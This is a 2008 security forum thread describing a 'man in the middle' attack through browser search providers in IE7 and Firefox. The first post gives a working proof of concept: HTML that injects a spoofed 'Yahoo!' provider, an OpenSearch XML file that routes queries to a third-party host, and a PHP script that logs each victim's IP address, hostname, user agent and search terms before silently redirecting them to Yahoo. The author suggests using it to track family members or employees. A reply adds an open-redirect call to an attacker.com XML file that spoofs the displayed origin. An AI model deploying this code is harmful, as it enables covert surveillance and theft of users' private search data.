Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cross-Browser "Search Provider" Man In The Middle Attack
Date: January 26, 2008 04:27AM

NOTE: This is something I came up with last week while attempting to try and find a new form of enumeration for browser plugins. I figured I would post it here in the event anyone else was interested. I've tried to format it the best way possible using uBB code, but in the event any of the code becomes formatted I have it all available on my own website. Below is the exact copy of the page, but with uBB formatting instead.
The reason I have used so many screenshots is to provide readers with a more clear idea of how it all comes together rather than trying to explain it using only words. I have tried to be as in depth as possible regarding the issue, how it works, and a few other things. I also tried to see if it was possible to cause a buffer overflow by creating an overly large search provider name, but with 4 million characters it simply wrapped the text on the context menu.

The Article:
A more appropriate title for this article, which is slightly clever yet done with a beaten-to-death style would be "All your search are belong to us". Both Microsoft Internet Explorer 7, and Mozilla Firefox are inherently vulnerable to having users' searches intercepted in an odd "Man In The Middle" style scenario slightly similar in nature to the way "Cross-Site Authentication" is performed. Originally setting out to attempt and create a new form of enumeration this vulnerability was a result of both reading an MSDN article on the "window.external" object regarding its limitations, and how "OpenSearch" XML technology can be used in order to create personalized browser search plugins. Being that Microsoft has only recently added a more useful integrated search toolbar into their Internet Explorer browser (as of 7.0) this was to be the target of the original experimentation until it was realized that Mozilla Firefox also had such capabilities, which is where Microsoft must have apparently borrowed the idea from.
More and more search engines are featuring "Search Providers", which can be both temporarily or permanently enabled on the browser client in order to allow individuals to make use of web services without having to necessarily navigate to the actual website. By default Mozilla Firefox includes Google as its specified search engine, and for Microsoft Internet Explorer it is Windows Live Search (formerly MSN). There are slight differences between the two browsers in regard to how this feature functions however both of them are vulnerable at the very least in the fact that it's possible for search terms and queries entered by users to be intercepted, and logged on third-party domains.

Microsoft Internet Explorer 7

The "OpenSearch" toolbar is located in the upper-right hand corner of Microsoft Internet Explorer 7, and normally resembles that of the above image. When text is entered within this field, and either the magnifying glass icon is clicked, or the user enters a carriage return the browser automatically uses the chosen search engine to initiate a query. Microsoft Internet Explorer supports up to 200 total search providers, and to switch between each service a user simply uses a mousedown action on the "down arrow" icon to cause Internet Explorer to create a context menu which lists each search engine that is available (both ones that are temporarily embedded through the use of HTML or ones physically added to the Windows registry). This appears similar to the following image:

As mentioned in the above statement only a single line of HTML (along with a valid OpenSearch XML document) is required to temporarily add a search provider service to Microsoft Internet Explorer 7. When the browser detects the element in the page's source it causes the toolbar to visibly change by altering the color of the drop-down menu icon from its normal gray gradient to one with an orange tone. Temporary search providers only apply to the window or tab that the HTML source is located on, which means if a user is running multiple tabs, and switches between them that the provider will only be available and appear on the window when the page containing the HTML has been given focus. This looks similar to the figure found below:

In the event a new search provider is indeed present the chosen name stemming from the "title" attribute in the HTML LINK entity (not an HREF link) will appear in the list with a star icon adjacent to it. An example of this being demonstrated can be found in the depiction below, which was caused while navigating from a random website to the Alexa search engine.

If a user chooses to add the search provider permanently to the Microsoft Internet Explorer 7 web browser by choosing "Add Search Providers" from the menu (assuming one is detected), or if a client-side script tries to force this action using the "window.external.AddSearchProvider" function then a prompt will appear similar to that of the next image requiring the user to verify the validity of the search provider before allowing it to be added to the browser permanently via the Windows registry.

Again in the previous figure the name of the search engine which appears in the prompt can arbitrarily be spoofed, or falsified, but must be done so in the physical XML file containing the necessary search provider information. This is due to the fact that when a search provider service is to be added indefinitely by the user Internet Explorer requests the XML file containing the "OpenSearch" data, and parses it to allow the individual to authenticate the search engine prior to having it become allowed for use perpetually. To demonstrate this fact a small snippet of HTML code is embedded within the test document. The following snippet was used to create the next graphical representation:

<link rel="search" title="AnDrEw's Fake Search Engine" type="application/opensearchdescription+xml" href="http://www.thirdpartywebsite.com/search.xml">
The single line of HTML code displayed above takes care of temporarily adding a search provider to the Internet Explorer search field, and due to the simplistic nature of both the OpenSearch XML format, and the flexibility of the feature provided by the browser one can easily create a phony web search tool posing as a more popular or well-known service. An excellent example of this is a fradulent "Yahoo!" search provider entry added to the search area created with a slight modification to the above HTML source.


Again as a safety precaution to prevent such abuse from taking place Internet Explorer once more spawns a prompt when the counterfeit search provider is going to be set as a permanent plugin. At first glance it appears with "www.awesomeandrew.net" (regardless of the fact that the XML file was actually found several directories from the root one), which is a good indicator that it is not the official Yahoo! search engine service . Again an attempt was made to circumvent this safeguard by instead creating a large subdomain like those made popular by MySpace phishing schemes, or similar to the "Proof of Concept" created by several individuals for Cross-Site Authentication.

Upon once again modifying the location of the XML file and refreshing the new URL where the search service apparently originates is "...rch.yahoo.com.search.p.query.toggled.4", which proved that Microsoft Internet Explorer's prompt would truncate erroneously long addresses. While security-minded individuals would more than likely see it and immediately flag it as suspicious most computer users would simply accept it without giving it a second look (again MySpace phishing URLs serve as the perfect example). Before moving on to the practical exploitation example first one should also look at how Mozilla Firefox handles the situation.

Mozilla Firefox

Like Microsoft's Internet Explorer Mozilla Firefox's search bar is also found at the top-right of the browser, but features a few additional elements its competition lacks. Obviously one of the most visible differences between Firefox's search input and that of Internet Explorer's is the fact that favicon images appear to the left of each search provider listed as an available addon. By depressing the mouse on the arrow next to the search service's icon a list of any pre-installed or pre-existing search engine services appear, but again with a respective favicon to its left.

When a new search service is detected in Mozilla Firefox it is a lot less noticeable, but the button surrounding the selected provider's icon is highlighted.

When the user checks the list to see what has been offered both the name and the 16 by 16 pixel favicon image from the search provider's respective website appears.

Should the user choose to add the service directly through the menu there is no prompt, warning, or other type of dialog pointing out the actual URL to the location of the XML file like there was on Internet Explorer. This is shown in the figure found below.

Hoping perhaps there was some type of preference setting, which actually output the URL to the search provider the "Manage Search Engines..." option was chosen from the menu. After opening this window however it was very clear that there was no indication that the address of the search plugin could be lying on any malicious or nefarious third-party website.

Since Firefox seems to have its own unique support of the search option why not take advantage of it? A new temporary search provider was created to demonstrate that both the title and image of an entry could be forged easily by any individual in an attempt to deliberately deceive potential victims into trusting the service as a legitimate feature.


The only point at which Firefox even attempts to make an effort at notifying its users that a search engine provider may not be as it seems is when again when a client-side script is used to try and add a search service through the "window.external" object. This is shown in the above picture, which also establishes that Firefox does not prune the actual URL pointing to the XML file's location, or have it wrap in such a manner that it would be possible to beguile gullible individuals into intentionally augmenting their search provider feature with deceitful services.

Cross-Browser Search Provider Exploitation
Now that the finer points of the customizable search engine field on each browser have been discussed it is time for a "Proof of Concept" example highlighting how a "Man In The Middle" attack can be performed through the simple exploitation and abuse of such legitimate features along with the naivety of the browsers' users.

Temporary Search Provider HTML
<link rel="search" title="Yahoo!" type="application/opensearchdescription+xml" href="http://www.thirdpartywebsite.com/search.xml">

OpenSearch 1.1 XML Document/Search Provider File
<?xml version="1.0" encoding="UTF-8"?> <OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
     <ShortName>Yahoo!</ShortName>
     <LongName>Yahoo! Web Search</LongName>
     <Description>Use Yahoo! Web Search Directly From Your Browser!</Description>
     <InputEncoding>utf-8</InputEncoding>
     <Image width="16" height="16">http://www.yahoo.com/favicon.ico</Image>
     <Url type="text/html" template="http://www.thirdpartywebsite.com/logger.php?search={searchTerms}"/>
     <moz:Url type="text/html" method="GET" template="http://www.thirdpartywebsite.com/logger.php?search={searchTerms}"/>
     <moz:UpdateInterval>7</moz:UpdateInterval>
     <moz:UpdateUrl>http://www.thirdpartywebsite.com/search.xml</moz:UpdateUrl>
     <moz:IconUpdateUrl>http://www.yahoo.com/favicon.ico</moz:IconUpdateUrl>
     <moz:SearchForm>http://www.thirdpartywebsite.com/</moz:SearchForm>
     <Tags>yahoo internet web search</Tags>
</OpenSearchDescription>

PHP Search Term Interceptor/Logging Script
<?php
if (!isset($_SERVER["HTTP_REFERER"])) {
     if (isset($_REQUEST["search"])) {
     $RawSearch = $_REQUEST["search"];
     $Searched = htmlentities($_REQUEST["search"], ENT_QUOTES);
     $LogfileDatabase = fopen("userssearches.html","a+");
     $UserData = "Date: " . date("l\, F dS Y") . "<br>\n";
     $UserData .= "Time: " . date("h:i:s A") . "<br>\n";
     $UserData .= "IP Address: " . $_SERVER["REMOTE_ADDR"] . "<br>\n";
     $UserData .= "Hostname: " . htmlentities(gethostbyaddr($_SERVER["REMOTE_ADDR"]), ENT_QUOTES) . "<br>\n";
     $UserData .= "User-Agent: " . htmlentities($_SERVER["HTTP_USER_AGENT"], ENT_QUOTES) . "<br>\n";
     $UserData .= "Search Query: " . $Searched . "<br>\n<br>\n";
     fwrite($LogfileDatabase, $UserData);
     fclose($LogfileDatabase);
     header("Location: http://search.yahoo.com/search?p=" . $RawSearch);
     exit;
     }
     else
     {
     header("Location: http://www.yahoo.com/");
     exit;
     }
}
else
{
header("Location: http://www.yahoo.com/");
exit;
}
?>
The "Proof of Concept" being used in this example is a fraudulent Yahoo! search provider service, which first logs user-input and other miscellaneous data before forwarding the individual to the actual search query results that are actually provided by Yahoo!. The PHP script first checks to verify that there is no HTTP referrer (or the "Referer" header) in place, because the search providers inside of the browsers do not forward any with the actual request, and then proceeds to make sure a query has been specified. If neither of the conditions are met then the client is forwarded to Yahoo!'s official website. Otherwise an HTML file is opened and written to logging the date, time, the I.P. address of the user who made the search, the individual's hostname, their User-Agent, and the search terms used in the query (all of which have been sanitized to prevent any type of Cross-Site Scripting in the logs). Once the file has completed recording each piece of data relating to the victim in question the unaltered search query is then forwarded to Yahoo!, which presents the individual with the information they were looking for without necessarily having brought to their attention that any malicious activity has taken place.
This "Man In The Middle" scheme could prove quite useful for SEO purposes, tracking users (or family members who use the same computer, corporate employees, et cetera), or in an attempt to create a website similar to "AOL Stalker" (hxxp://www.aolstalker.com). It also coincides nicely with Microsoft's recent decision to force users to upgrade to Internet Explorer 7, and the European Union's recent push to make I.P. addresses "Personally Identifiable Information".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Cross-Browser "Search Provider" Man In The Middle Attack
Posted by: gerry
Date: January 27, 2008 02:10PM

Another thing to note that in Firefox (maybe others), you can use redirects to spoof the domain when calling AddSearchProvider(). For example, if you host a search provider named "Google " at attacker.com/google.xml. Installing it via:

window.external.AddSearchProvider('http://www.google.com/searchhistory/url?url=http://www.attacker.com/google.xml');

Will display the origin as google.com not attacker.com.

-g
[hiredhacker.com]

Options: ReplyQuote
Re: Cross-Browser "Search Provider" Man In The Middle Attack
Date: January 27, 2008 06:44PM

Thanks Gerry! The thought of using an open redirect to spoof the location of the source to the XML file never even crossed my mind. I'm going to continue playing with the window.external object to see if I can come up with any other interesting concepts.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote


Sorry, only registered users may post in this forum.